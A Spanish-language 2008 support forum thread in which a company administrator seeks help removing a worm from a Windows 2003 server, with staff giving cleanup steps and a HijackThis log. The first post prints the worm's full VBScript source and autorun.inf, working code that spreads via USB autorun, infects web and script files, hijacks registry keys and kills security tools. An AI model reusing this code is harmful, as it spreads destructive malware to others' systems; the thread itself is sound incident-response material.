Virus daño servidor (TERMINADO)

Cerrado
brokenfred
Mensajes: 12
Registrado: 24 Sep 2007, 18:40
Ubicación: Colombia

Virus daño servidor (TERMINADO)

Mensaje por brokenfred » 12 Abr 2008, 04:45

Hola Buen día.



Por favor una ayuda urgente, en la empresa donde laboro un virus ingreso al servidor y me daño todo el sistema de DNS, Active Directory, DHCP, Wins o sea todos los servicios del servidor, realice la recuperación del sistema pero fue inutil, tenemos el Nod32 y no detectó nada, el ad-aware tampoco, nos cortó la comunicacion con internet cuando se abre el internet explorer se queda casi bloqueado y empiesa a abrir mas o menos cada 10 segundos una nueva ventana del internet explorer, tiene un .vbs y autorun.inf en todas las unidades, tambien lo escanee en modo seguro con Flashdisinfector y Superantyspyware y tampoco funcionó, en modo normal con ccleaner con limpiador y luego registro y nada, ayuda por favor no puedo formatear porque la información de ese servidor es muy importante para la empresa, tiene instalado windows 2003 server R2.



**Aqui esta autorun.



[AutoRun]

shell\AutoRun=´ò¿ª(A)

shell\AutoRun\command=WScript.exe {HCQ9D-TVCWX-X9QRG-J4B2Y-GR2TT-CM3HY-26VYW-6JRYC-X66GX-JVY2D}.vbs "AutoRun"



**El {HCQ9D-TVCWX-X9QRG-J4B2Y-GR2TT-CM3HY-26VYW-6JRYC-X66GX-JVY2D}.vbs



'$Top_2

Dim Cnt, CntMax, Maxsize,Path_V1,Path_V2,Name_V1,Version

Cnt = 0

CntMax = 150

Maxsize = 150000

Name_V1 = "{HCQ9D-TVCWX-X9QRG-J4B2Y-GR2TT-CM3HY-26VYW-6JRYC-X66GX-JVY2D}.vbs"

Path_V1 = GetSFolder(1) & Name_V1 '0:Windows 1:System 2:Temp

Path_V2 = GetSFolder(0) & Name_V1

Version="2"





Call Main()



Sub Main()

On Error Resume Next

If IsVbs() = true Then

Call ExeVbs()

ElseIf IsHtml() = true Then

Call ExeWebPage()

End If

End Sub



Sub ExeWebPage()

On Error Resume Next

Dim objfso,vbsCode,SFSO

SFSO="Vfulswlqj1IlohV|vwhpRemhfw"



Set objfso = CreateObject(DeCode(SFSO))



vbsCode = GetScriptCode("vbscript")

Call DeSafeSet()

Call InvadeSystem(objfso,vbsCode)

Set objfso = Nothing

End Sub





Sub DeSafeSet()

Dim HLMShow , HCUAdvanced

Dim HCUExplorer

HLMShow= "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Folder\Hidden\SHOWALL \CheckedValue"

HCUAdvanced="HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\ShowSuperHidden"

HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\NoDriveTypeAutoRun"

Call WriteReg (HCUExplorer, 129, "REG_DWORD")

Call WriteReg (HCUAdvanced,0,"REG_DWORD")

Call WriteReg (HLMShow,0,"REG_DWORD")

End Sub



Sub SetFileAttr(f, pathf)

Dim vf

Set vf = f.GetFile(pathf)

vf.Attributes = 6

End Sub



Sub CopyFile(f, code, pathf)

On Error Resume Next

Dim vf

Set vf = f.OpenTextFile(pathf, 2, true)

vf.Write code

End Sub



Function GetScriptCode(Languages)

On Error Resume Next

Dim soj

For Each soj In document.Scripts

If LCase(soj.Language) = Languages Then

Select Case LCase(soj.Language)

Case "vbscript"

GetScriptCode = soj.Text

Exit Function

Case "javascript"

GetScriptCode = soj.Text

Exit Function

End Select



End If

Next

End Function



Sub ExeVbs()

On Error Resume Next

Dim objfso,objshell,FullPath_Self,Name_Self,vbsCode

Dim ArgNum,Para_V,oArgs,SubPara_V,RunPath

Dim FullPath_OK,SFSO



FullPath_OK= GetSFolder(0) & "OK.ini"

SFSO="Vfulswlqj1IlohV|vwhpRemhfw"



Set objfso = CreateObject(DeCode(SFSO))

Set objshell = CreateObject("wscript.shell")

Call InitializeVBS(objfso, objshell)



Name_Self =WScript.ScriptName

FullPath_Self = WScript.ScriptFullName

If Name_Self = Name_V1 Then

Set oArgs = WScript.Arguments

ArgNum = 0

Do While ArgNum < oArgs.Count

Para_V = Para_V & " " & oArgs(ArgNum)

ArgNum = ArgNum + 1

Loop



SubPara_V = Lcase(Right(Para_V,3))

Select Case SubPara_V

Case "run"



RunPath = left(FullPath_Self,2)

Call Run(RunPath)



vbsCode = GetSelfCode(objfso, FullPath_Self)

Call InvadeSystem(objfso,vbsCode)

Call Run(Path_V1)



Case "txt"

RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V

Call Run(RunPath)



vbsCode = GetSelfCode(objfso, FullPath_Self)

Call InvadeSystem(objfso,vbsCode)

Call Run(Path_V1)



Case Else

If PreInstance = True Then

WScript.Quit

End If



vbsCode = GetSelfCode(objfso, FullPath_Self)

Call InvadeSystem(objfso,vbsCode)



If objfso.FileExists(FullPath_OK) = False or IsOK(objfso,Date(), FullPath_OK) =False Then

Call DeSafeSet()

Call SearchDrives(objfso,vbsCode)

Call OK(objfso,Date(), FullPath_OK)

End If



Call Monitor(objfso,vbsCode)

End Select

Else

vbsCode = GetSelfCode(objfso, FullPath_Self)

Call InvadeSystem(objfso,vbsCode)

Call Run(Path_V1)



End If

Set objfso = Nothing

Set objshell = Nothing

End Sub



Sub InitializeVBS(f, Shell)

On Error Resume Next

Dim T

T=Shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")

If (T>=1) Then

Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"

End if



End Sub



Function PreInstance()

On Error Resume Next

Dim num_cnt

num_cnt = 0

PreInstance = False

strComputer = "."

Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")

For Each objProcess in colProcessList

If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then

num_cnt = num_cnt + 1

End If

Next

If num_cnt>= 2 Then

PreInstance = True

End If

End Function



Function IsOK(fso,Now_V,path_f)

Dim vf

IsOK = False

Set vf = fso.OpenTextFile(path_f,1)

If vf.readline ="OK" And InStr(vf.readline ,Now_V) >0 Then

IsOK = True

ElseIf InStr(vf.readline, "Admin") >0 Then

msgbox "You are Admin!!!"

IsOK = True

End If

End Function



Sub OK(fso,Now_V,path_f)

Dim vf

Set vf = fso.OpenTextFile(path_f,2,True)

vf.write "OK" & vbcrlf

vf.Writeline Now_V

Call SetFileAttr(fso,path_f)

End Sub



Sub Monitor(objfso,vbsCode)

On Error Resume Next

Dim dc,d

ProcessNames = Array("ras.exe","360tray.exe","taskmgr.exe","regedit.exe","msconfig.exe","SREng.exe","USBAntiVir.exe")

Do

Call KillProcess(ProcessNames)

Call InvadeSystem(objfso,vbsCode)

Set dc = objfso.Drives

For Each d In dc

Call AutoRun(objfso, d.DriveLetter,vbsCode)

Next

WScript.sleep 10000

Loop



End Sub



Sub AutoRun(f, D,vbsCode)

On Error Resume Next

Dim path_autorun, path_vbs,inf_autorun

path_autorun = D & ":\AutoRun.inf" 'AutoRun.infÍêÕû·¾¶

path_vbs = D & ":\" & Name_V1



If f.FileExists(path_vbs) = false or f.FileExists(path_autorun) = False Then



If f.FileExists(path_autorun) = true Then

f.DeleteFile path_autorun, True

End If

If f.FileExists(path_vbs) = true Then

f.DeleteFile path_vbs, True

End If



Call CopyFile(f, vbsCode, path_vbs)

Call SetFileAttr(f, path_vbs)



inf_autorun = "[AutoRun]" & vbCrLf & "shell\AutoRun=´ò¿ª(A)" & vbCrLf & "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun"""

Call CopyFile(f, inf_autorun, path_autorun)

Call SetFileAttr(f, path_autorun)

End If

End Sub



Function IsVbs()

On Error Resume Next

Dim TErr

TErr = WScript.ScriptFullName

If Err Then

Err.Clear

IsVbs = false

Else

IsVbs = true

End If

End Function



Function IsHtml()

On Error Resume Next

Dim TErr

TErr = document.Location

If Err Then

Err.Clear

IsHtml = false

Else

IsHtml = true

End If

End Function



Function GetVersion(f,path_v)

Dim buffer ,fv ,n

Set fv=f.OpenTextFile(path_v, 1)

buffer=fv.ReadALL()

n = InStr(buffer, "'$Top")

GetVersion=Mid(buffer,n+6,1)

End Function



Sub InvadeSystem(f,vbsCode)

On Error Resume Next

Dim Value,dc,d,HCULoad

HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"

If f.FileExists(Path_V1) = True Then

If GetVersion(f,Path_V1)<Version Then

f.DeleteFile Path_V1 ,True

End If

End If



If f.FileExists(Path_V1) = false Then

Call CopyFile(f, vbsCode, Path_V1)

Call SetFileAttr(f, Path_V1)

End If





If ReadReg(HCULoad)<> Path_V1 Then

Call WriteReg (HCULoad, Path_V1, "")

End If





If f.FileExists(Path_V2) = false Then

Call CopyFile(f, vbsCode, Path_V2)

Call SetFileAttr(f, Path_V2)

End If



Value = "%SystemRoot%\System32\WScript.exe " & """" & Path_V2 & """" & " %1 %* "

If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\ open\command\")<>Value Then

Call SetTxtFileAss(Path_V2)

End If



If ReadReg(HCULoad)<> Path_V1 And ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\ open\command\")<>Value Then

Set dc = f.Drives

For Each d In dc

Call AutoRun(f, d.DriveLetter,vbsCode)

Next

End If

End Sub



Sub SetTxtFileAss(sFilePath)

On Error Resume Next

Dim Value

Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "

Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\ open\command\", Value, "REG_EXPAND_SZ")

End Sub



Function GetSelfCode(f, FullPath_Self)

On Error Resume Next

Dim n, n1, buffer, Self

Set Self = f.OpenTextFile(FullPath_Self, 1)

buffer = Self.ReadAll

n = InStr(buffer, "'$Top")

n1 = InstrRev(buffer, "'$Bottom")

buffer = Mid(buffer, n, n1 - n + 8)

GetSelfCode = buffer

Self.Close

End Function



Sub SearchDrives(f,vbsCode)

On Error Resume Next

Dim d ,dc

Set dc = f.Drives

For Each d In dc

If Cnt >= CntMax Then '

Exit For

End If

If (d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3) And d.DriveLetter <> "C" Then

Call SearchFile(f, d.Path & "\",vbsCode)

End If

Next

End Sub





Sub SearchFile(f, strPath,vbsCode)

On Error Resume Next

Dim pfo,pf,pfi,ext

Dim psfo,ps

Set pfo = f.GetFolder(strPath)

Set pf = pfo.Files

For Each pfi In pf

If Cnt >= CntMax Then

Exit For

End If

ext = LCase(f.GetExtensionName(pfi.Path))



Select Case ext

Case "htm" ,"html","asp","vbs":

Call InfectHead(pfi.Path, pfi, f, vbsCode, ext)

Case "mpg", "rmvb", "avi", "rm" :

If IsSexFile(pfi.Name) = True Then

pfi.Delete

End If

End Select

Next



Set psfo = pfo.SubFolders

For Each ps In psfo

If Cnt >= CntMax Then

Exit For

End If

Call SearchFile(f, ps.Path,vbsCode)

Next

End Sub



Function IsSexFile(fname)

IsSexFile = false

If InStr(fname, "³ÉÈË")>0 Or InStr(fname, "Òù")>0 Or InStr(fname, "͵ÅÄ")>0 Or _

InStr(fname, "͵¿ú")>0 Or InStr(fname, "¿Ú½»")>0 Or InStr(fname, "Ç¿¼é")>0 Or _

InStr(fname, "ÂÖ¼é")>0 Or InStr(fname, "Â×ÀíÆ¬")>0 Or InStr(fname, "×ÔÃþ")>0 Then

IsSexFile = true

End If

End Function



Function Isinfected(buffer, ftype)

Isinfected = true

Select Case ftype

Case "htm" , "html" , "asp", "vbs":

If InStr(buffer, "'$Top") = 0 Then

Isinfected = false

End If

Case Else

Isinfected = true

End Select

End Function



Sub InfectHead(strPath, fi, f, vbsCode, ftype)

On Error Resume Next

Dim tso, buffer,strCode

If fi.Size< Maxsize Then

Set tso = f.OpenTextFile(strPath, 1, true)

buffer = tso.ReadAll()

tso.Close

Select Case ftype

Case "htm" , "html" , "asp":

If Isinfected(buffer, ftype) = false Then

strCode = MakeScript(vbsCode, 0)

Set tso = f.OpenTextFile(strPath, 2, true)

Cnt = Cnt + 1

tso.Write strCode & vbCrLf & buffer

tso.Close

Set tso = Nothing

End If

Case "vbs":

If Isinfected(buffer, ftype) = false Then

n = InStr(buffer , "Option Explicit")

If n<>0 Then

buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)

Set tso = f.OpenTextFile(strPath, 2, true)

tso.Write vbsCode & vbCrLf & buffer

Cnt = Cnt + 1

tso.Close

Set tso = Nothing

Else

Set tso = f.OpenTextFile(strPath, 2, true)

tso.Write vbsCode & vbCrLf & buffer

Cnt = Cnt + 1

tso.Close

Set tso = Nothing

End If

End If

Case Else

End Select

End If



End Sub



Function GetSF(f, p)

On Error Resume Next

GetSF = f.GetSpecialFolder(p) & "\"

End Function



Function GetSFolder(p)

On Error Resume Next

Dim f

Set f = CreateObject("Scripting.FileSystemObject")

GetSFolder = f.GetSpecialFolder(p) & "\"

Set f = Nothing

End Function



Function MakeScript(strCode, T)

If T = 1 Then

MakeScript = EnCode(strCode)

Else

MakeScript = "<" & "SCRIPT Language = VBScript>" & vbCrLf & strCode & vbCrLf & "</" & "SCRIPT>"

End If



End Function



Sub KillProcess(ProcessNames)

On Error Resume Next

Set objWMIService = GetObject("winmgmts:{impersonationLevel=Impersonate}!root\cim v2")

For Each ProcessName in ProcessNames

Set colProcessList = objWMIService.execquery(" Select * From win32_process where name = '" & ProcessName & "' ")

For Each objProcess in colProcessList

objProcess.terminate()

Next

Next

End Sub



Sub DeleteReg(strkey)

On Error Resume Next

Set tmps = CreateObject("wscript.shell")

tmps.RegDelete strkey

Set tmps = Nothing

End Sub



Function ReadReg(strkey)

On Error Resume Next

Dim tmps

Set tmps = CreateObject("wscript.shell")

ReadReg = tmps.RegRead(strkey)

Set tmps = Nothing

End Function



Sub WriteReg(strkey, Value, vtype)

On Error Resume Next

Dim tmps

Set tmps = CreateObject("wscript.shell")

If vtype = "" Then

tmps.RegWrite strkey, Value

Else

tmps.RegWrite strkey, Value, vtype

End If

Set tmps = Nothing

End Sub



Sub Run(ExeFullName)

On Error Resume Next

Dim WshShell

Set WshShell = WScript.CreateObject("wscript.shell")

WshShell.Run ExeFullName

Set WshShell = Nothing

End Sub



Function DeCode(Coded)

On Error Resume Next

For i= 1 To Len(Coded)

Curchar=Mid(Coded,i,1)

If Asc(Curchar) = 16 then

Curchar=chr(8)

Elseif Asc(Curchar) = 24 then

Curchar=chr(12)

Elseif Asc(Curchar) = 32 then

Curchar=chr(18)

Else

Curchar=chr(Asc(Curchar)-3)

End if



DeCode=Decode & Curchar

Next

End Function

'$Bottom



Tambien utilicé el Elistara, Elitriip, Elidela pero no me ha dado resultado.



Via mail les envio copia de estos archivos en un comprimido con el nombre virus.zip el password es "virus"

El asunto del mail es "VSCRIPT MUESTRA"



Gracias de antemano por su ayuda.

Avatar de Usuario
msc hotline sat
Mensajes: 93500
Registrado: 09 Mar 2004, 20:39
Ubicación: BARCELONA (ESPAÑA)
Contactar:

Re: Virus daño servidor

Mensaje por msc hotline sat » 12 Abr 2008, 06:36

Pues es lógico que el NOD32 no lo detecte porque parece ser un nuevo virus que ni nosotros conocemos !



Parece ser un virus de VBS hecho por algun forofo de Visual Basic, coder informático o gangster con fines antiempresas, por las malas intenciones que se aprecian en su script...



De entrada, arranque en modo seguro y renombre todos estos AUTORUN.* a AUTORUN.VIR para que no se autoejecuten a partir del proximo acceso.



Y si no nos dice nada mas, el lunes, cuando volvamos al trabajo en SATINFO, analizaremos y monitorizaremos las muestras enviadas, pero si quiere decirnos el resultado tras lo indicado de renombrar a .VIR su extension, fuera cual fuera, así como otros comentarios que creyeran oportunos, trataremos de seguir encauzando el Tema hacia su solucion.



saludos



ms, 12-04-2008

Avatar de Usuario
msc hotline sat
Mensajes: 93500
Registrado: 09 Mar 2004, 20:39
Ubicación: BARCELONA (ESPAÑA)
Contactar:

Re: Virus daño servidor

Mensaje por msc hotline sat » 12 Abr 2008, 07:05

Centrandoº atencion en el Tema, entiendo que nos ha posteado el contenido de dos ficheros, por una parte del AUTORUN.INF y por otro un VBS llamado {HCQ9D-TVCWX-X9QRG-J4B2Y-GR2TT-CM3HY-26VYW-6JRYC-X66GX-JVY2D}.vbs



Pues lo que deciamos de renombrar el AUTORUN.INF a .VIR, hagalo tambien con todos los {HCQ9D-TVCWX-X9QRG-J4B2Y-GR2TT-CM3HY-26VYW-6JRYC-X66GX-JVY2D}.vbs ya que además de ser lanzado este por acceder a cualquier carpeta que contenga el AUTORUN.INF, lo puede hacer desde el registro de sistema, en una clave que lo lance ya desde el inicio. Todo ello hagalo arrancando en modo seguro.



Aparte, como que parece ser un virus que se propaga por pendrive, vacune el ordenador y todos sus pendrives con el ELIPEN:


[quote="para DESCARGAR el ELIPEN, msc"] http://www.zonavirus.com/descargas/elipen.asp



Tras probarlo, reiniciar y postearnos el contenido de C:\infosat.txt para ver el resultado del proceso [/quote]


y posteenos el log del HJT, para corregir las claves que veamos ha creado el malware:



[b]

[color=yellow]HJT : (HiJackThis)[/color][/b]




[i]¿Como utilizar el Hijackthis ?[/i]

Lo primero que debemos hacer es descargarlo en nuestro ordenador y ubicarlo en una carpeta propia C:\HijackThis\

Ejecútarlo y presionar el botón "[b]Do a system scan and save a logfile[/b]"; el programa realizará el escaneo e inmediatamente generará el Log, sólo te pedira el nombre del archivo y su ubicación, puedes simplemente guardarlo así como está.

Se abrirá el Bloc de Notas, copia todo el contenido y pégalo como respuesta de este Tema

· [url=http://www.zonavirus.com/descargas/trendmicro-hijackthis.asp][b]Descargar Hijackthis[/b][/url]



Tras analizarlo, informaremos





TOdo ello servirá para hacer una utilidad que lo detecte, elimine y restaure la normalidad a los ordenadores infectados, aunque primero hayamos de investigarlo y hacerlo manualmente con menor comodidad... :wink:



Analizando un poco el script vemos que inhabilita las siguientes aplicaciones:



"ras.exe","360tray.exe","taskmgr.exe","regedit.exe","msconfig.exe","SREng.exe","USBAntiVir.exe"



pues termina su proceso con un KillProcess, sin duda para impedir que el usuario detenga el servicio malware desde el Administrador de Tareas y edite el registro con el REGEDIT, asi que ahorrarse el intentarlo por estos medios. Afortunadamente tenemos otros...



A la vista del log del HJT, seguiremos



saludos



ms, 12-04-2008

brokenfred
Mensajes: 12
Registrado: 24 Sep 2007, 18:40
Ubicación: Colombia

Re: Virus daño servidor

Mensaje por brokenfred » 12 Abr 2008, 18:07

Gracias pues voy a proceder a instalar el HiJackThis, quería comentar primero que el regedit nunca se bloqueó siempre tuve acceso entonces desde allí modifique la clave:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, el valor UncheckedValue, y tambien la clave:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL, el valor CheckedValue y con esto pude ver los archivos ocultos, procedi a buscar el wscript y el cscript, los encontre en C:\WINDOWS\system32 y en C:\WINDOWS\system32\dllcache los borre y creé unos archivos con nombre igual en la carpeta C:\WINDOWS\system32 para que no se pudiera copiar, reinicie en modo seguro, realicé un escaneo con flashdesinfector y luego con superantyspyware, reinicié y en modo normal de nuevo con ccleaner en limpiador y no encontró nada pero la revision del registro arrojo muchisimas claves modificadas las reparé y borré los archivos wscript y cscript que yo mismo había creado en C:\WINDOWS\system32, borré también las copias del autorun y el .vbs en los discos y las usb, con esto ya no se volvió a copiar.

Pero ahora el sistema operativo quedó como loco, no me toma la configuracion de las tarjeta de red, son dos, el internet explorer quedó bloqueado no abre nada, y los servicios del servidor no se pueden iniciar, al tratar de iniciar el servicio dns por ejemplo me sale un error que dice: "Error 14: Espacio de almacenamiento insuficiente para completar esta operación"

y los mismo con cualquier servicio, no se si sea el controlador de la tarjeta de red que se habrá dañado por el virus.

Voy a escanear con el HiJackThis a ver que sale.

Avatar de Usuario
msc hotline sat
Mensajes: 93500
Registrado: 09 Mar 2004, 20:39
Ubicación: BARCELONA (ESPAÑA)
Contactar:

Re: Virus daño servidor

Mensaje por msc hotline sat » 12 Abr 2008, 18:26

A veces es peor el remedio que la enfermedad...



Nos dice que "[b][i]realicé un escaneo con flashdesinfector y luego con superantyspyware, reinicié y en modo normal de nuevo con ccleaner en limpiador y no encontró nada pero la revision del registro arrojo muchisimas claves modificadas las reparé [/i][/b]"



Ha obrado bajo su criterio, a lo cual está en su derecho, pero con ello puede haber eliminado claves necesarias y no saber cuales ...



A la vista del log del HJT le diremos, de las que quedan, las que conviene eliminar, pero lo que haya hecho anteriormente, dificilmente lo podrá restaurar, a no ser que disponga de punto de restauracion anterior al problema al cual acceder y restaurar la normalidad, como sería nuestro deseo.



A pesar de ello, el lunes analizaremos las muestras enviadas, las monitorizaremos e implementaremos en el proximo ELISTARA su control y eliminacion, a lo que el virus quedará eliminado y restaurada la normalidad, provocada por el virus, pero no necesariamente por lo que haya podido hacer con lo que nos ha dicho que ha hecho.



saludos



ms, 12-04-2008

brokenfred
Mensajes: 12
Registrado: 24 Sep 2007, 18:40
Ubicación: Colombia

Re: Virus daño servidor

Mensaje por brokenfred » 12 Abr 2008, 19:20

Ya hice el escaneo con HiJackThis pero no se ejecuta el notepad, sale el siguiente error: No se encuentra el archivo de comandos "C:Windows\{HCQ9D-TVCWX-X9QRG-J4B2Y-GR2TT-CM3HY-26VYW-6JRYC-X66GX-JVY2D}.vbs"

Sin embargo adjunto imágenes de reporte de HiJackThis.
Adjuntos
hijackthis03.JPG
hijackthis02.JPG
hijackthis01.JPG

Avatar de Usuario
msc hotline sat
Mensajes: 93500
Registrado: 09 Mar 2004, 20:39
Ubicación: BARCELONA (ESPAÑA)
Contactar:

Re: Virus daño servidor

Mensaje por msc hotline sat » 12 Abr 2008, 19:37

Por razones médicas no trabajo con fondo blanco, y tus imagenes no me son útiles. (Me distorsiona el fondo blanco y desde el año pasado ya he pasado tres veces por quirofano, dos transplantes de cornea y demas, y antes de fin de año me temo que habré de volver :? )



Abre el fichero con el WordPad si no te funciona el NotePad, y posteanos su contenido, u otra posibilidad en tu caso es anexar dicho fichero a tu proximo post, de respuesta a este Tema, excepcionalmente, claro.



saludos



ms, 12-04-2008

Avatar de Usuario
msc hotline sat
Mensajes: 93500
Registrado: 09 Mar 2004, 20:39
Ubicación: BARCELONA (ESPAÑA)
Contactar:

Re: Virus daño servidor

Mensaje por msc hotline sat » 12 Abr 2008, 19:59

Y a pesar de ello, lo he intentado, pero además en una imagen ni se pueden Buscar ni Seleccionar ni copiar y pegar... definitivamente no es util.



Ya ves que ello pasa por haber eliminado el fichero gusano sin eliminar la clave que intercepta la ejecucion de determinados ficheros, lo cual ya hacen otros virus y lo soslayamos con nuestras utilidades, pero si ya has pasado el ELISTARA como decias al principio, en este caso no debe seguir el mismo método.



No sé si ello te lo hace con todos los EXE, ni con qué otros tipos de ficheros lo hace, pero podrías probar renombrando el NOTEPAD.EXE a NOTEPAD.SCR por ejemplo, a ver si este otro tipo no está interceptado... y nos lo comentas, o ya nos posteas el log con un copiar y pegar si con ello te va.



saludos



ms, 12-04-2008





NOTA: De todas formas, quizas el virus reinstaló la interceptacion tras el ELISTARA, y ahora que ya lo has "eliminado" vuelve a probarlo, y esta vez con el ELITRIIP, con el que atacamos virus no troyanos:


[quote="para DESCARGAR el ELITRIIP, msc"] http://www.zonavirus.com/descargas/elitriip.asp



Tras probarlo, reiniciar y postearnos el contenido de C:\infosat.txt para ver el resultado del proceso [/quote]


A ver si tras ello ya puedes ejecutar el NotePad ... ms.

brokenfred
Mensajes: 12
Registrado: 24 Sep 2007, 18:40
Ubicación: Colombia

Re: Virus daño servidor

Mensaje por brokenfred » 12 Abr 2008, 20:11

Bueno ya pude, aqui esta el log:



Logfile of HijackThis v1.99.1

Scan saved at 01:14:49 p.m., on 12/04/2008

Platform: Windows 2003 SP2 (WinNT 5.02.3790)

MSIE: Internet Explorer v7.00 (7.00.6000.16640)



Running processes:

C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\spoolsv.exe

C:\Archivos de programa\HP\Cissesrv\Cissesrv.exe

C:\WINDOWS\system32\CpqRcmc.exe

C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe

C:\WINDOWS\system32\Dfssvc.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\ntfrs.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\system32\sysdown.exe

C:\hp\hpsmh\bin\smhstart.exe

C:\Archivos de programa\RealVNC\VNC4\WinVNC4.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\srmhost.exe

C:\WINDOWS\Explorer.EXE

C:\Archivos de programa\Java\jre1.6.0_05\bin\jusched.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\ctfmon.exe

C:\HijackThis.exe

C:\WINDOWS\system32\notepad.exe



R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =

R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://go.microsoft.com/fwlink/?LinkId=74005

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Vínculos

R3 - URLSearchHook: (no name) - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)

F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,

O2 - BHO: Aplicación auxiliar de vínculos de Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Archivos de programa\Archivos comunes\Adobe\Acrobat\ActiveX\AcroIEHelper.dll

O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Archivos de programa\Java\jre1.6.0_05\bin\ssv.dll

O4 - HKLM\..\Run: [CPQTEAM] cpqteam.exe

O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Archivos de programa\Java\jre1.6.0_05\bin\jusched.exe"

O4 - HKLM\..\Run: [ISUSPM Startup] C:\ARCHIV~1\ARCHIV~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup

O4 - HKLM\..\Run: [ISUSScheduler] "C:\Archivos de programa\Archivos comunes\InstallShield\UpdateService\issch.exe" -start

O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe

O4 - Global Startup: Inicio rápido de Adobe Reader.lnk = C:\Archivos de programa\Adobe\Reader 8.0\Reader\reader_sl.exe

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Archivos de programa\Java\jre1.6.0_05\bin\ssv.dll

O9 - Extra 'Tools' menuitem: Consola de Sun Java - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Archivos de programa\Java\jre1.6.0_05\bin\ssv.dll

O10 - Broken Internet access because of LSP provider 'c:\documents and settings\administrador.colcqdomp01\windows\system32\mswsock.dll' missing

O11 - Options group: [INTERNATIONAL] International*

O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1172154158468

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = colcqdomp01.carboquimica.com.co

O17 - HKLM\Software\..\Telephony: DomainName = colcqdomp01.carboquimica.com.co

O17 - HKLM\System\CCS\Services\Tcpip\..\{D97EABE8-3836-454F-B4C9-50EA9A407A22}: NameServer = 192.168.4.11,192.168.1.12,200.31.12.1,200.31.17.92

O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = colcqdomp01.carboquimica.com.co

O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = colcqdomp01.carboquimica.com.co

O18 - Protocol: hpapp - {24F45006-5BD9-41B7-9BD9-5F8921C8EBD1} - C:\Archivos de programa\Compaq\Cpqacuxe\Bin\hpapp.dll

O20 - Winlogon Notify: dimsntfy - dimsntfy.dll (file missing)

O23 - Service: Servicio de búsqueda sobre experiencia con aplicaciones (AeLookupSvc) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Servicio de puerta de enlace de capa de aplicación (ALG) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\alg.exe (file missing)

O23 - Service: Administración de aplicaciones (AppMgmt) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

O23 - Service: Servicio de estado de ASP.NET (aspnet_state) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe (file missing)

O23 - Service: Audio de Windows (AudioSrv) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\System32\svchost.exe (file missing)

O23 - Service: Servicio de transferencia inteligente en segundo plano (BITS) - Unknown owner - C:\Documents and Settings\administrador.COLCQDOMP01\WINDOWS\system32\svchost.exe (file missing)

